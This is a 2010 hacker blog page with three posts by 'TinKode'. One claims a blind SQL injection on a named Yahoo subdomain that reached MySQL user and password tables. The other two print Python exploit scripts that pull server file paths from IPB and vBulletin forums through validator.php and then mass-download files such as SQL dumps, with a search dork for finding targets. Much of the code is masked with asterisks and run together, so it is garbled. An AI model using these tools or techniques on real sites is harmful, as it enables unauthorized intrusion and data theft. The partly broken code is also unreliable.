TinKode-Yahoo Blind SQL Injection

Yahoo Blind SQL Injection

Posted by isrtinkode on February 18, 2010

__     __   _                   ____  _ _           _    _____  ____  _      _
\ \   / /  | |                 |  _ \| (_)         | |  / ____|/ __ \| |    (_)
 \ \_/ /_ _| |__   ___   ___   | |_) | |_ _ __   __| | | (___ | |  | | |     _
  \   / _` | '_ \ / _ \ / _ \  |  _ <| | | '_ \ / _` |  \___ \| |  | | |    | |
   | | (_| | | | | (_) | (_) | | |_) | | | | | | (_| |  ____) | |__| | |____| |
   |_|\__,_|_| |_|\___/ \___/  |____/|_|_|_| |_|\__,_| |_____/ \___\_\______|_|

                                            #By c0de.breaker@Romania

Yahoo! Inc. is an American public corporation headquartered in Sunnyvale, California, (in Silicon Valley), that provides Internet services worldwide. The company is perhaps best known for its web portal, search engine (Yahoo! Search), Yahoo! Directory, Yahoo! Mail, Yahoo! News, advertising, online mapping (Yahoo! Maps), video sharing (Yahoo! Video), and social media websites and services.
According to Web traffic analysis companies (including Compete.com, comScore, Alexa Internet, Netcraft, and Nielsen Ratings), the domain yahoo.com attracted at least 1.575 billion visitors annually by 2008. The global network of Yahoo! websites receives 3.4 billion page views per day on average as of October 2007. It is the second most visited website in the world in May 2009.

Vulnerable website: http://hk.adspecs.yahoo.com

Testing…

In this picture we can see as SELECT work

Now we try to find the version:

#Version: 5.0.11.24

Ok, it’s normal until now, but we can have access to mysql.user (bad)

And some tables from mysql.user (default)

MySQL Database, Table: user
#user
#password

~TinKode

Read More

TinKode-IPB Full Disclosure Exploit [Python]

IPB Full Disclosure Exploit [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1

################################################################
#           _____ _____  ____  (validator.php)            #
#         |_   _|  __ \|  _ \                            #
#    | | | |__) | |_) |                           #
#     | | |  ___/|  _ <                            #
#     _| |_| |    | |_) |                           #
#     |_____|_|    |____/                            #
#                                   @expl0it...                #
################################################################
#          [ IPB Files / Directories Full Disclosure ]         #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                 Special thanks for: cmiN                     #
#                 www.TinKode.BayWords.com                     #
################################################################

#! /usr/bin/env python3.1 ################################################################ # _____ _____ ____ (validator.php) # # |_ _| __ \| _ \ # # | | | |__) | |_) | # # | | | ___/| _ < # # _| |_| | | |_) | # # |_____|_| |____/ # # @expl0it... # ################################################################ # [ IPB Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | _____ _____ ____ (TM) | \t | |_ _| __ \| _ \ | \t | | | | |__) | |_) | | \t | | | | ___/| _ < | \t | _| |_| | | |_) | | \t | |_____|_| |____/ | \t | | \t | | \t | IPB Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: ipbfd.py scan http://www.site.com/IPB_folder | | ipbfd.py download *.zip -> all | | ipbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(********) == 3: try: print("Please wait...") if args[1] == "********": extract_parse_save(********)) elif args[1] == "********": download_data(********]) except Exception as message: print("An error occurred: ********)) except: print("Unknown error.") else: print(********") else: print(usage) input() def extract_parse_save(url): print("[+]Extracting content...") hurl = url + "/validator.php" with ********.********) as usock: source = usock.read().decode() print("[+]Finding token...") word = "validate('" index = source.find(word) if index != -1: source = source[********):] value = source[:source.index(********)] hurl = url ********.format(********) else: print("[!]Token not found.") print("[+]********...") with urllib.request.******** as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = line.decode() index = line.find(********) if index != -1: lastk = line[index + ********" ").strip(********) index = line.find(********") if index != -1: lastv = line[index + ********:line.index("********")].********(" ") if lastk != None and lastv != None: index = ********") if index in (********, 0): lastk = "[other] {}".format(lastk) else: lastk = "[********}".format(********) dictionary[********astv ******** = None, None print("[+]Organizing and saving paths...") with open("********", "********") as fout: fout.write(********) keys = sorted(********) for key in keys: fout.write(********)) def download_data(files): print("[+]Searching ********...") mthreads = ******** with open(********) as fin: url = fin.readline()********) if files.find("*") == -1: hurl = ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = l********) if pieces[0].count(ext) == 1: upath = pieces[1] hurl = ********) while threading.active********reads: pass Download(********) while threading.active_count(******** pass class Download(********): def __********): threading.Thread.********) ******** = url def run(self): try: with urllib.request.urlopen(********usock: data = ********) uparser = urllib.parse.urlparse(********) pieces = uparser.********) ******** = pieces[********] with open(********) as fout: fout.********) except: pass ********__main__": main()

You must have python 3.1 to work!

Read More

TinKode-vBulletin Full Disclosure [Python]

vBulletin Full Disclosure [Python]

Posted by isrtinkode on February 19, 2010

#! /usr/bin/env python3.1
#
################################################################
#                ____        _ _      _   _ (validator.php)    #
#               |  _ \      | | |    | | (_)                   #
#         __   _| |_) |_   _| | | ___| |_ _ _ __               #
#         \ \ / /  _ <| | | | | |/ _ \ __| | '_ \              #
#          \ V /| |_) | |_| | | |  __/ |_| | | | |             #
#           \_/ |____/ \__,_|_|_|\___|\__|_|_| |_|             #
#                                   @expl0it...                #
################################################################
#       [ vBulletin Files / Directories Full Disclosure ]      #
#    [ Vuln discovered by TinKode / xpl0it written by cmiN ]   #
#           [ Greetz: insecurity.ro, darkc0de.com ]            #
################################################################
#                                                              #
#                  Special thanks for: cmiN                    #
#                  www.TinKode.BayWords.com                    #
################################################################

#! /usr/bin/env python3.1 # ################################################################ # ____ _ _ _ _ (validator.php) # # | _ \ | | | | | (_) # # __ _| |_) |_ _| | | ___| |_ _ _ __ # # \ \ / / _ <| | | | | |/ _ \ __| | '_ \ # # \ V /| |_) | |_| | | | __/ |_| | | | | # # \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| # # @expl0it... # ################################################################ # [ vBulletin Files / Directories Full Disclosure ] # # [ Vuln discovered by TinKode / xpl0it written by cmiN ] # # [ Greetz: insecurity.ro, darkc0de.com ] # ################################################################ # # # Special thanks for: cmiN # # www.TinKode.BayWords.com # ################################################################ import os, sys, urllib.request, urllib.parse, threading def main(): logo = """ \t |---------------------------------------------------------------| \t | ____ _ _ _ _ (TM) | \t | | _ \ | | | | | (_) | \t | __ _| |_) |_ _| | | ___| |_ _ _ __ | \t | \ \ / / _ <| | | | | |/ _ \ __| | '_ \ | \t | \ V /| |_) | |_| | | | __/ |_| | | | | | \t | \_/ |____/ \__,_|_|_|\___|\__|_|_| |_| | \t | | \t | vBulletin Full Disclosure expl0it | \t | Written by cmiN | \t | Vulnerability discovered by TinKode | \t | | \t | Dork: intext:"Powered by vBulletin" | \t | Visit: www.insecurity.ro & www.darkc0de.com | \t |---------------------------------------------------------------| """ usage = """ |---------------------------------------------------------------| |Usage: vbfd.py scan http://www.site.com/vB_folder | | vbfd.py download *.sql -> all | | vbfd.py download name.jpg -> one | |---------------------------------------------------------------|""" if sys.platform in ("linux", "linux2"): clearing = "clear" else: clearing = "cls" os.system(clearing) print(logo) args = sys.argv if len(args) == 3: try: print("Please wait...") if args[1] == "scan": extract_parse_save(********)) elif args[1] == "********": download_data(********) except Exception as message: print("An error occurred: {}".********) except: print("Unknown error.") else: print(********) else: print(usage) input() def extract_parse_save(url): print("[+]********...") hurl = url + "/validator.php" with urllib.request.******** as usock: source = ********() print("[+]Finding ********") word = "validate('" source = source[source******** + len(word):] value = ********] print("[+]Obtaining paths...") hurl = url + "/validator********(value) with urllib.request.urlopen(hurl) as usock: lastk, lastv = None, None dictionary = dict() for line in usock: line = ********() index = ********") if index != -1: lastk = line[index ********(" ") index = line.find("********") if index != -1: lastv = line********) if lastk != None and lastv != None: index = ********) if index in (-1, 0): lastk = "********) else: lastk = "[{}] {}".format(********) dictionary[lastk] = lastv lastk, lastv = None, None print("[+]Organizing and saving paths...") with open(********) as fout: fout.********) keys = sorted(dictionary.keys()) for key in keys: fout.write********(key, dictionary[key])) def download_data(files): print("[+]Searching and downloading files...") ******** = 50 with open("********) as fin: url = fin.readline(********) if files.find******** hurl = url + ********) Download(hurl).start() else: ext = files[files.********] for line in fin: pieces = line********) if pieces[0].******** upath = pieces[1] hurl = ********) while threading.active_********) > ******** pass Download(********).start() while threading.********) > 1: pass class Download(********): def __init__(self, url): threading.Thread.__********) self.url = ******** def run(********): try: with urllib.request.urlopen(self.url) as usock: data = ********() uparser = urllib.parse.urlparse(********) pieces = ********.********) fname = pieces[********] with open(********) as fout: ********.write(data) except: pass ********"__main__": main()

You need python 3.1 to work!

Read More